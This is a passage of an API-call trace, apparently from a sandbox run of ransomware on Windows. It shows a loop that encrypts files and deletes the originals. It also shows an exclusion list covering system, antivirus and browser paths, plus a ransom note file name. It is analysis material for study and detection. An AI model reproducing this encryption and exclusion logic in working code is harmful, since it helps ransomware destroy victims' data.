lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.259] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.259] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.259] GetLastError () returned 0x0 [0172.259] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.259] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.259] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.259] GetLastError () returned 0x0 [0172.259] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.259] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.259] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.259] GetLastError () returned 0x0 [0172.259] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.261] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS") returned 1 [0172.261] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS" (normalized: "c:\\program files\\microsoft office\\office16\\ospp.vbs")) returned 1 [0172.262] CryptDestroyKey (hKey=0x9ad778) returned 1 [0172.262] wcslen (_String="OK") returned 0x2 [0172.262] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0172.262] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0172.262] CryptDestroyKey (hKey=0x9ad7f8) returned 1 [0172.262] CryptDestroyHash (hHash=0x9ad2f8) returned 1 [0172.262] CryptReleaseContext (hProv=0x8e2e68, dwFlags=0x0) returned 1 [0172.262] PathMatchSpecW (pszFile="OSPPREARM.EXE", pszSpec="*NMCRYPT") returned 0 [0172.262] PathMatchSpecW (pszFile="OSPPREARM.EXE", pszSpec="*Recovers your files.html") returned 0 [0172.262] PathMatchSpecW (pszFile="OSPPREARM.EXE", pszSpec="*.exe") returned 1 [0172.262] FindNextFileW (in: hFindFile=0x9ad1b8, lpFindFileData=0x2d7ed7c | out: lpFindFileData=0x2d7ed7c) returned 1 [0172.262] PathMatchSpecW (pszFile="SLERROR.XML", pszSpec="*NMCRYPT") returned 0 [0172.262] PathMatchSpecW (pszFile="SLERROR.XML", pszSpec="*Recovers your files.html") returned 0 [0172.262] PathMatchSpecW (pszFile="SLERROR.XML", pszSpec="*.exe") returned 0 [0172.262] PathMatchSpecW (pszFile="SLERROR.XML", pszSpec="*.dll") returned 0 [0172.262] PathMatchSpecW (pszFile="SLERROR.XML", pszSpec="*.lnk") returned 0 [0172.262] PathMatchSpecW (pszFile="SLERROR.XML", pszSpec="*.bat") returned 0 [0172.262] PathMatchSpecW (pszFile="SLERROR.XML", pszSpec="*.ini") returned 0 [0172.262] PathMatchSpecW (pszFile="SLERROR.XML", pszSpec="*.msi") returned 0 [0172.262] PathMatchSpecW (pszFile="SLERROR.XML", pszSpec="*.scf") returned 0 [0172.262] PathMatchSpecW (pszFile="SLERROR.XML", pszSpec="*pagefile.sys*") returned 0 [0172.262] PathMatchSpecW (pszFile="SLERROR.XML", pszSpec="*NTUSER.DAT*") returned 0 [0172.262] PathMatchSpecW (pszFile="SLERROR.XML", pszSpec="*AppData*") returned 0 [0172.262] PathMatchSpecW (pszFile="SLERROR.XML", pszSpec="*\\winrar\\*") returned 0 [0172.262] PathMatchSpecW (pszFile="SLERROR.XML", pszSpec="*\\Internet Explorer\\*") returned 0 [0172.262] PathMatchSpecW (pszFile="SLERROR.XML", pszSpec="*\\java\\*") returned 0 [0172.262] PathMatchSpecW (pszFile="SLERROR.XML", pszSpec="*\\TeamViewer\\*") returned 0 [0172.262] PathMatchSpecW (pszFile="SLERROR.XML", pszSpec="*\\windows\\*") returned 0 [0172.263] PathMatchSpecW (pszFile="SLERROR.XML", pszSpec="*\\ESET\\*") returned 0 [0172.263] PathMatchSpecW (pszFile="SLERROR.XML", pszSpec="*\\AVG\\*") returned 0 [0172.263] PathMatchSpecW (pszFile="SLERROR.XML", pszSpec="*\\AVIRA\\*") returned 0 [0172.263] PathMatchSpecW (pszFile="SLERROR.XML", pszSpec="*\\AVAST Software\\*") returned 0 [0172.263] PathMatchSpecW (pszFile="SLERROR.XML", pszSpec="*Atheros*") returned 0 [0172.263] PathMatchSpecW (pszFile="SLERROR.XML", pszSpec="*Realtek*") returned 0 [0172.263] PathMatchSpecW (pszFile="SLERROR.XML", pszSpec="*bootmgr*") returned 0 [0172.263] PathMatchSpecW (pszFile="SLERROR.XML", pszSpec="*boot*") returned 0 [0172.263] PathMatchSpecW (pszFile="SLERROR.XML", pszSpec="*boot*") returned 0 [0172.263] PathMatchSpecW (pszFile="SLERROR.XML", pszSpec="*CONFIG.SYS*") returned 0 [0172.263] PathMatchSpecW (pszFile="SLERROR.XML", pszSpec="*IO.SYS*") returned 0 [0172.263] PathMatchSpecW (pszFile="SLERROR.XML", pszSpec="*MSDOS.SYS*") returned 0 [0172.263] PathMatchSpecW (pszFile="SLERROR.XML", pszSpec="*NTDETECT.COM*") returned 0 [0172.263] PathMatchSpecW (pszFile="SLERROR.XML", pszSpec="*ntldr*") returned 0 [0172.263] PathMatchSpecW (pszFile="SLERROR.XML", pszSpec="*chrome*") returned 0 [0172.263] PathMatchSpecW (pszFile="SLERROR.XML", pszSpec="*opera*") returned 0 [0172.263] PathMatchSpecW (pszFile="SLERROR.XML", pszSpec="*firefox*") returned 0 [0172.263] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML", pszSpec="*") returned 1 [0172.263] strlen (_Str="NMoreira") returned 0x8 [0172.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: 